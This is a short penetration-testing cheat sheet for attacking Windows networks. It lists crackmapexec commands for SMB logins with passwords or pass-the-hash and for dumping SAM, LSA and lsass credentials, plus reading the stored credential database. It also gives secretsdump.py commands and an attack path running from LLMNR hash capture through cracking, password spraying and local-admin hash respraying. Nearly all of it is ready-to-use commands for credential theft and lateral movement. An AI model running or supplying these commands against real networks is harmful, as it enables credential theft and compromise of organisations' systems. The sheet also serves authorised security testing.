# SMB
crackmapexec smb IP_ADDRESS or SUBNET -u USER -d DOMAIN -p PASSWORD
# SMB using Hash (only NTLMv1)
crackmapexec smb IP_ADDRESS or SUBNET -u USER -H HASH --local-auth
# Dump SAM - add this at the end of the command
--sam
# List shares on machines
--shares
# Dump LSA
--lsa
# Use lsassy to dump and parse lsass
-M lsassy
# Access CrackMapExec DB
cmedb
# Dumps all hosts in DB
hosts
# Dumps all creds in DB
creds
Secretsdump.py
Commands
# Using a password
secretsdump.py DOMAIN/USER:'PASSWORD'@IP_ADDRESS
# Using hashes
secretsdump.py USER@IP_ADDRESS -hashes HASH
Attack path
llmnr -> hash -> crack hashes -> spray password -> look for new logins -> secretsdump with new logins -> local admin hashes -> respray network with local accounts